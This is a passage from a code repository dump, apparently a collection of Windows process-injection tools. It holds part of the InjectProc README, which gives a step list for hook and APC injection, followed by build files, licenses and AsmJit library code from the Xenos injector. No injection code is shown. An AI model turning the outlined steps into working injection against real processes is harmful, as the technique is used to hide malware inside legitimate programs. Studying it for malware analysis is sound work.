injection: 25 | * Find/Create process. 26 | * Set hook 27 | 28 | ## APC injection: 29 | * Open process. 30 | * Allocate space. 31 | * Write code into remote threads. 32 | * "Execute" threads using QueueUserAPC. 33 | 34 | ## Download 35 | [Windows x64 binary](https://github.com/secrary/InjectProc/releases) - x64 bit DEMO 36 | ## Dependencies: 37 | [vc_redist.x64](https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads) - Microsoft Visual C++ Redistributable 38 | ## DEMO 39 | [InjectProc DEMO - Process Injection Techniques](https://www.youtube.com/watch?v=hLPDq9nSHMw) 40 | 41 | ## Contributors 42 | - [nullbites](https://github.com/nullbites) 43 | 44 | # Warning 45 | Works on Windows 10 build 1703, 64bit. 46 | 47 | I've not enough time to test other systems and make it portable if you have enough time please contribute. 48 | 49 | I create this project for me to better understand how process injection works and 50 | I think it will be helpful for many beginner malware analysts too. 51 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 💉 Injectors 2 | 3 | For educational use only! 4 | -------------------------------------------------------------------------------- /Xenos/Xenos.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26403.3 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Xenos", "src\Xenos.vcxproj", "{94E0DA6C-F15C-416A-8992-5B067095F473}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlackBone", "ext\BlackBone\src\BlackBone\BlackBone.vcxproj", "{A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Win32 = Debug|Win32 13 | Debug|x64 = Debug|x64 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.ActiveCfg = Debug|Win32 19 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.Build.0 = Debug|Win32 20 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.Deploy.0 = Debug|Win32 21 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.ActiveCfg = Debug|x64 22 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.Build.0 = Debug|x64 23 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.Deploy.0 = Debug|x64 24 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|Win32.ActiveCfg = Release|Win32 25 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|Win32.Build.0 = Release|Win32 26 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|x64.ActiveCfg = Release|x64 27 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|x64.Build.0 = Release|x64 28 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|Win32.ActiveCfg = Debug|Win32 29 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|Win32.Build.0 = Debug|Win32 30 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|x64.ActiveCfg = Debug|x64 31 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|x64.Build.0 = Debug|x64 32 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|Win32.ActiveCfg = Release|Win32 33 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|Win32.Build.0 = Release|Win32 34 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|x64.ActiveCfg = Release|x64 35 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|x64.Build.0 = Release|x64 36 | EndGlobalSection 37 | GlobalSection(SolutionProperties) = preSolution 38 | HideSolutionNode = FALSE 39 | EndGlobalSection 40 | EndGlobal 41 | -------------------------------------------------------------------------------- /Xenos/appveyor.yml: -------------------------------------------------------------------------------- 1 | version: 1.0.{build} 2 | 3 | branches: 4 | only: 5 | - master 6 | 7 | image: Visual Studio 2017 8 | clone_folder: c:\projects\xenos 9 | 10 | platform: 11 | - Win32 12 | - x64 13 | 14 | configuration: 15 | - Debug 16 | - Release 17 | 18 | install: 19 | - cmd: git submodule update --init --recursive 20 | 21 | build: 22 | parallel: true 23 | project: Xenos.sln -------------------------------------------------------------------------------- /Xenos/ext/blackbone/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 DarthTon 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of 6 | this software and associated documentation files (the "Software"), to deal in 7 | the Software without restriction, including without limitation the rights to 8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of 9 | the Software, and to permit persons to whom the Software is furnished to do so, 10 | subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS 17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR 18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER 19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/Xenos.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26403.3 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Xenos", "src\Xenos.vcxproj", "{94E0DA6C-F15C-416A-8992-5B067095F473}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlackBone", "ext\BlackBone\src\BlackBone\BlackBone.vcxproj", "{A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Win32 = Debug|Win32 13 | Debug|x64 = Debug|x64 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.ActiveCfg = Debug|Win32 19 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.Build.0 = Debug|Win32 20 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|Win32.Deploy.0 = Debug|Win32 21 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.ActiveCfg = Debug|x64 22 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.Build.0 = Debug|x64 23 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Debug|x64.Deploy.0 = Debug|x64 24 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|Win32.ActiveCfg = Release|Win32 25 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|Win32.Build.0 = Release|Win32 26 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|x64.ActiveCfg = Release|x64 27 | {94E0DA6C-F15C-416A-8992-5B067095F473}.Release|x64.Build.0 = Release|x64 28 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|Win32.ActiveCfg = Debug|Win32 29 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|Win32.Build.0 = Debug|Win32 30 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|x64.ActiveCfg = Debug|x64 31 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Debug|x64.Build.0 = Debug|x64 32 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|Win32.ActiveCfg = Release|Win32 33 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|Win32.Build.0 = Release|Win32 34 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|x64.ActiveCfg = Release|x64 35 | {A2C53563-46F5-4D87-903F-3F1F2FDB2DEB}.Release|x64.Build.0 = Release|x64 36 | EndGlobalSection 37 | GlobalSection(SolutionProperties) = preSolution 38 | HideSolutionNode = FALSE 39 | EndGlobalSection 40 | EndGlobal 41 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/appveyor.yml: -------------------------------------------------------------------------------- 1 | version: 1.0.{build} 2 | 3 | branches: 4 | only: 5 | - master 6 | 7 | image: Visual Studio 2017 8 | clone_folder: c:\projects\blackbone 9 | 10 | platform: 11 | - Win32 12 | - x64 13 | 14 | configuration: 15 | - Debug 16 | - Debug(DLL) 17 | - Release 18 | - Release(DLL) 19 | 20 | build: 21 | parallel: true 22 | project: BlackBone.sln 23 | 24 | skip_commits: 25 | message: /Driver/ -------------------------------------------------------------------------------- /Xenos/ext/blackbone/appveyor_drv.yml: -------------------------------------------------------------------------------- 1 | version: 1.0.{build} 2 | 3 | branches: 4 | only: 5 | - master 6 | 7 | image: Visual Studio 2015 8 | clone_folder: c:\projects\blackboneDrv 9 | 10 | platform: 11 | - x64 12 | 13 | configuration: 14 | - Win10Debug 15 | - Win10Release 16 | - Win8.1 Debug 17 | - Win8.1 Release 18 | - Win8 Debug 19 | - Win8 Release 20 | - Win7 Debug 21 | - Win7 Release 22 | 23 | build: 24 | parallel: true 25 | project: src/BlackBoneDrv/BlackBoneDrv.sln 26 | 27 | only_commits: 28 | message: /Driver/ -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/ApiBegin.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | #if !defined(_ASMJIT_BUILD_H) 8 | #include "build.h" 9 | #endif // !_ASMJIT_BUILD_H 10 | 11 | // ============================================================================ 12 | // [MSVC] 13 | // ============================================================================ 14 | 15 | #if defined(_MSC_VER) 16 | // Disable some warnings we know about 17 | # pragma warning(push) 18 | # pragma warning(disable: 4127) // conditional expression is constant 19 | # pragma warning(disable: 4201) // nameless struct/union 20 | # pragma warning(disable: 4244) // '+=' : conversion from 'int' to 'x', possible 21 | // loss of data 22 | # pragma warning(disable: 4251) // struct needs to have dll-interface to be used 23 | // by clients of struct ... 24 | # pragma warning(disable: 4275) // non dll-interface struct ... used as base for 25 | // dll-interface struct 26 | # pragma warning(disable: 4355) // this used in base member initializer list 27 | # pragma warning(disable: 4480) // specifying underlying type for enum 28 | # pragma warning(disable: 4800) // forcing value to bool 'true' or 'false' 29 | 30 | // Rename symbols. 31 | # if !defined(vsnprintf) 32 | # define ASMJIT_DEFINED_VSNPRINTF 33 | # define vsnprintf _vsnprintf 34 | # endif // !vsnprintf 35 | # if !defined(snprintf) 36 | # define ASMJIT_DEFINED_SNPRINTF 37 | # define snprintf _snprintf 38 | # endif // !snprintf 39 | #endif // _MSC_VER 40 | 41 | // ============================================================================ 42 | // [GNUC] 43 | // ============================================================================ 44 | 45 | #if defined(__GNUC__) && !defined(__clang__) 46 | # if __GNUC__ >= 4 && !defined(__MINGW32__) 47 | # pragma GCC visibility push(hidden) 48 | # endif // __GNUC__ >= 4 49 | #endif // __GNUC__ 50 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/ApiEnd.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // ============================================================================ 8 | // [MSVC] 9 | // ============================================================================ 10 | 11 | #if defined(_MSC_VER) 12 | // Pop disabled warnings by ApiBegin.h 13 | # pragma warning(pop) 14 | // Rename symbols back. 15 | # if defined(ASMJIT_DEFINED_VSNPRINTF) 16 | # undef ASMJIT_DEFINED_VSNPRINTF 17 | # undef vsnprintf 18 | # endif // ASMJIT_DEFINED_VSNPRINTF 19 | # if defined(ASMJIT_DEFINED_SNPRINTF) 20 | # undef ASMJIT_DEFINED_SNPRINTF 21 | # undef snprintf 22 | # endif // ASMJIT_DEFINED_SNPRINTF 23 | #endif // _MSC_VER 24 | 25 | // ============================================================================ 26 | // [GNUC] 27 | // ============================================================================ 28 | 29 | #if defined(__GNUC__) && !defined(__clang__) 30 | # if __GNUC__ >= 4 && !defined(__MINGW32__) 31 | # pragma GCC visibility pop 32 | # endif // __GNUC__ >= 4 33 | #endif // __GNUC__ 34 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/LICENSE.md: -------------------------------------------------------------------------------- 1 | AsmJit - Complete x86/x64 JIT and Remote Assembler for C++ 2 | Copyright (c) 2008-2014, Petr Kobalicek 3 | 4 | This software is provided 'as-is', without any express or implied 5 | warranty. In no event will the authors be held liable for any damages 6 | arising from the use of this software. 7 | 8 | Permission is granted to anyone to use this software for any purpose, 9 | including commercial applications, and to alter it and redistribute it 10 | freely, subject to the following restrictions: 11 | 12 | 1. The origin of this software must not be misrepresented; you must not 13 | claim that you wrote the original software. If you use this software 14 | in a product, an acknowledgment in the product documentation would be 15 | appreciated but is not required. 16 | 2. Altered source versions must be plainly marked as such, and must not be 17 | misrepresented as being the original software. 18 | 3. This notice may not be removed or altered from any source distribution. 19 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_BASE_H 9 | #define _ASMJIT_BASE_H 10 | 11 | // [Dependencies - AsmJit] 12 | #include "build.h" 13 | 14 | #include "base/assembler.h" 15 | #include "base/codegen.h" 16 | #include "base/compiler.h" 17 | #include "base/constpool.h" 18 | #include "base/containers.h" 19 | #include "base/cpuinfo.h" 20 | #include "base/cputicks.h" 21 | #include "base/error.h" 22 | #include "base/globals.h" 23 | #include "base/intutil.h" 24 | #include "base/lock.h" 25 | #include "base/logger.h" 26 | #include "base/operand.h" 27 | #include "base/runtime.h" 28 | #include "base/string.h" 29 | #include "base/vectypes.h" 30 | #include "base/vmem.h" 31 | #include "base/zone.h" 32 | 33 | // [Guard] 34 | #endif // _ASMJIT_BASE_H 35 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base/cpuinfo.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/cpuinfo.h" 12 | 13 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 14 | #include "../x86/x86cpuinfo.h" 15 | #else 16 | // ? 17 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 18 | 19 | // [Dependencies - Posix] 20 | #if defined(ASMJIT_OS_POSIX) 21 | # include 22 | # include 23 | # include 24 | # include 25 | #endif // ASMJIT_OS_POSIX 26 | 27 | // [Api-Begin] 28 | #include "../apibegin.h" 29 | 30 | namespace asmjit { 31 | 32 | // ============================================================================ 33 | // [asmjit::CpuInfo - DetectHwThreadsCount] 34 | // ============================================================================ 35 | 36 | uint32_t CpuInfo::detectHwThreadsCount() { 37 | #if defined(ASMJIT_OS_WINDOWS) 38 | SYSTEM_INFO info; 39 | ::GetSystemInfo(&info); 40 | return info.dwNumberOfProcessors; 41 | #elif defined(ASMJIT_OS_POSIX) && defined(_SC_NPROCESSORS_ONLN) 42 | // It seems that sysconf returns the number of "logical" processors on both 43 | // mac and linux. So we get the number of "online logical" processors. 44 | long res = ::sysconf(_SC_NPROCESSORS_ONLN); 45 | if (res == -1) return 1; 46 | 47 | return static_cast(res); 48 | #else 49 | return 1; 50 | #endif 51 | } 52 | 53 | // ============================================================================ 54 | // [asmjit::CpuInfo - GetHost] 55 | // ============================================================================ 56 | 57 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 58 | struct AutoX86CpuInfo : public X86CpuInfo { 59 | ASMJIT_INLINE AutoX86CpuInfo() : X86CpuInfo() { 60 | X86CpuUtil::detect(this); 61 | } 62 | }; 63 | #else 64 | #error "AsmJit - Unsupported CPU." 65 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 66 | 67 | const CpuInfo* CpuInfo::getHost() { 68 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 69 | static AutoX86CpuInfo cpuInfo; 70 | #else 71 | #error "AsmJit - Unsupported CPU." 72 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 73 | return &cpuInfo; 74 | } 75 | 76 | } // asmjit namespace 77 | 78 | // [Api-End] 79 | #include "../apiend.h" 80 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base/cputicks.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_BASE_CPUTICKS_H 9 | #define _ASMJIT_BASE_CPUTICKS_H 10 | 11 | // [Dependencies - AsmJit] 12 | #include "../base/globals.h" 13 | 14 | // [Api-Begin] 15 | #include "../apibegin.h" 16 | 17 | namespace asmjit { 18 | 19 | //! \addtogroup asmjit_base_util 20 | //! \{ 21 | 22 | // ============================================================================ 23 | // [asmjit::CpuTicks] 24 | // ============================================================================ 25 | 26 | //! CPU ticks utilities. 27 | struct CpuTicks { 28 | //! Get the current CPU ticks for benchmarking (1ms resolution). 29 | static ASMJIT_API uint32_t now(); 30 | }; 31 | 32 | //! \} 33 | 34 | } // asmjit namespace 35 | 36 | // [Api-End] 37 | #include "../apiend.h" 38 | 39 | // [Guard] 40 | #endif // _ASMJIT_BASE_CPUTICKS_H 41 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base/error.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/error.h" 12 | #include "../base/intutil.h" 13 | 14 | // [Api-Begin] 15 | #include "../apibegin.h" 16 | 17 | namespace asmjit { 18 | 19 | // ============================================================================ 20 | // [asmjit::ErrorHandler - Construction / Destruction] 21 | // ============================================================================ 22 | 23 | ErrorHandler::ErrorHandler() {} 24 | ErrorHandler::~ErrorHandler() {} 25 | 26 | // ============================================================================ 27 | // [asmjit::ErrorHandler - Interface] 28 | // ============================================================================ 29 | 30 | ErrorHandler* ErrorHandler::addRef() const { 31 | return const_cast(this); 32 | } 33 | 34 | void ErrorHandler::release() {} 35 | 36 | // ============================================================================ 37 | // [asmjit::ErrorUtil - AsString] 38 | // ============================================================================ 39 | 40 | #if !defined(ASMJIT_DISABLE_NAMES) 41 | static const char errorMessages[] = { 42 | "Ok\0" 43 | "No heap memory\0" 44 | "No virtual memory\0" 45 | "Invalid argument\0" 46 | "Invalid state\0" 47 | "No code generated\0" 48 | "Code too large\0" 49 | "Label already bound\0" 50 | "Unknown instruction\0" 51 | "Illegal instruction\0" 52 | "Illegal addressing\0" 53 | "Illegal displacement\0" 54 | "Overlapped arguments\0" 55 | "Unknown error\0" 56 | }; 57 | 58 | static const char* findPackedString(const char* p, uint32_t id, uint32_t maxId) { 59 | uint32_t i = 0; 60 | 61 | if (id > maxId) 62 | id = maxId; 63 | 64 | while (i < id) { 65 | while (p[0]) 66 | p++; 67 | 68 | p++; 69 | i++; 70 | } 71 | 72 | return p; 73 | } 74 | 75 | const char* ErrorUtil::asString(Error e) { 76 | return findPackedString(errorMessages, e, kErrorCount); 77 | } 78 | #endif // ASMJIT_DISABLE_NAMES 79 | 80 | } // asmjit namespace 81 | 82 | // [Api-End] 83 | #include "../apiend.h" 84 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base/globals.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/globals.h" 12 | 13 | // [Api-Begin] 14 | #include "../apibegin.h" 15 | 16 | namespace asmjit { 17 | 18 | // ============================================================================ 19 | // [asmjit::Assert] 20 | // ============================================================================ 21 | 22 | void assertionFailed(const char* exp, const char* file, int line) { 23 | ::fprintf(stderr, "Assertion failed: %s\n, file %s, line %d\n", exp, file, line); 24 | ::abort(); 25 | } 26 | 27 | } // asmjit namespace 28 | 29 | // [Api-End] 30 | #include "../apiend.h" 31 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/base/operand.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/globals.h" 12 | 13 | // [Api-Begin] 14 | #include "../apibegin.h" 15 | 16 | namespace asmjit { 17 | 18 | // ============================================================================ 19 | // [asmjit::Operand] 20 | // ============================================================================ 21 | 22 | // Prevent static initialization. 23 | struct Operand { 24 | uint8_t op; 25 | uint8_t size; 26 | uint8_t reserved_2_1; 27 | uint8_t reserved_3_1; 28 | uint32_t id; 29 | uint64_t reserved_8_8; 30 | }; 31 | 32 | ASMJIT_VAR const Operand noOperand; 33 | const Operand noOperand = { 0, 0, 0, 0, kInvalidValue, 0 }; 34 | 35 | } // asmjit namespace 36 | 37 | // [Api-End] 38 | #include "../apiend.h" 39 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/host.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_HOST_H 9 | #define _ASMJIT_HOST_H 10 | 11 | // [Dependencies - Core] 12 | #include "base.h" 13 | 14 | // ============================================================================ 15 | // [asmjit::host - X86 / X64] 16 | // ============================================================================ 17 | 18 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 19 | #include "x86.h" 20 | 21 | namespace asmjit { 22 | 23 | // Define `asmjit::host` namespace wrapping `asmjit::x86`. 24 | namespace host { using namespace ::asmjit::x86; } 25 | 26 | // Define host assembler. 27 | typedef X86Assembler HostAssembler; 28 | 29 | // Define host operands. 30 | typedef X86GpReg GpReg; 31 | typedef X86FpReg FpReg; 32 | typedef X86MmReg MmReg; 33 | typedef X86XmmReg XmmReg; 34 | typedef X86YmmReg YmmReg; 35 | typedef X86SegReg SegReg; 36 | typedef X86Mem Mem; 37 | 38 | // Define host utilities. 39 | typedef X86CpuInfo HostCpuInfo; 40 | 41 | // Define host compiler and related. 42 | #if !defined(ASMJIT_DISABLE_COMPILER) 43 | typedef X86Compiler HostCompiler; 44 | typedef X86CallNode HostCallNode; 45 | typedef X86FuncDecl HostFuncDecl; 46 | typedef X86FuncNode HostFuncNode; 47 | 48 | typedef X86GpVar GpVar; 49 | typedef X86MmVar MmVar; 50 | typedef X86XmmVar XmmVar; 51 | typedef X86YmmVar YmmVar; 52 | #endif // !ASMJIT_DISABLE_COMPILER 53 | 54 | } // asmjit namespace 55 | 56 | #endif // ASMJIT_HOST_X86 || ASMJIT_HOST_X64 57 | 58 | // [Guard] 59 | #endif // _ASMJIT_HOST_H 60 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/x86.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_X86_H 9 | #define _ASMJIT_X86_H 10 | 11 | // [Dependencies - AsmJit] 12 | #include "base.h" 13 | 14 | #include "x86/x86assembler.h" 15 | #include "x86/x86compiler.h" 16 | #include "x86/x86cpuinfo.h" 17 | #include "x86/x86inst.h" 18 | #include "x86/x86operand.h" 19 | 20 | // [Guard] 21 | #endif // _ASMJIT_X86_H 22 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/AsmJit/x86/x86scheduler_p.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_X86_X86SCHEDULER_P_H 9 | #define _ASMJIT_X86_X86SCHEDULER_P_H 10 | 11 | #include "../build.h" 12 | #if !defined(ASMJIT_DISABLE_COMPILER) 13 | 14 | // [Dependencies - AsmJit] 15 | #include "../x86/x86compiler.h" 16 | #include "../x86/x86context_p.h" 17 | #include "../x86/x86cpuinfo.h" 18 | #include "../x86/x86inst.h" 19 | 20 | // [Api-Begin] 21 | #include "../apibegin.h" 22 | 23 | namespace asmjit { 24 | 25 | // ============================================================================ 26 | // [asmjit::X86Scheduler] 27 | // ============================================================================ 28 | 29 | //! \internal 30 | //! 31 | //! X86 scheduler. 32 | struct X86Scheduler { 33 | // -------------------------------------------------------------------------- 34 | // [Construction / Destruction] 35 | // -------------------------------------------------------------------------- 36 | 37 | X86Scheduler(X86Compiler* compiler, const X86CpuInfo* cpuInfo); 38 | ~X86Scheduler(); 39 | 40 | // -------------------------------------------------------------------------- 41 | // [Run] 42 | // -------------------------------------------------------------------------- 43 | 44 | Error run(Node* start, Node* stop); 45 | 46 | // -------------------------------------------------------------------------- 47 | // [Members] 48 | // -------------------------------------------------------------------------- 49 | 50 | //! Attached compiler. 51 | X86Compiler* _compiler; 52 | //! CPU information used for scheduling. 53 | const X86CpuInfo* _cpuInfo; 54 | }; 55 | 56 | } // asmjit namespace 57 | 58 | // [Api-End] 59 | #include "../apiend.h" 60 | 61 | // [Guard] 62 | #endif // !ASMJIT_DISABLE_COMPILER 63 | #endif // _ASMJIT_X86_X86SCHEDULER_P_H 64 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Warning_for_C_coders.txt: -------------------------------------------------------------------------------- 1 | The library included in this package has been compiled using the stdcall convention( to respect habits from previous versions). But, header file is now configured to use by default the DLL version in cdecl convention. 2 | 3 | If you want to use the static library BeaEngine.lib, just add this at the very beginning of your source code : 4 | 5 | #define BEA_ENGINE_STATIC 6 | #define BEA_USE_STDCALL 7 | #include "BeaEngine.h" 8 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.dll -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.exp -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngine.lib -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.dll -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.exp -------------------------------------------------------------------------------- /Xenos/ext/blackbone/contrib/BeaEngine/Win32/Dll/BeaEngineCheetah.lib: -------------------------------------------------------------------------------- 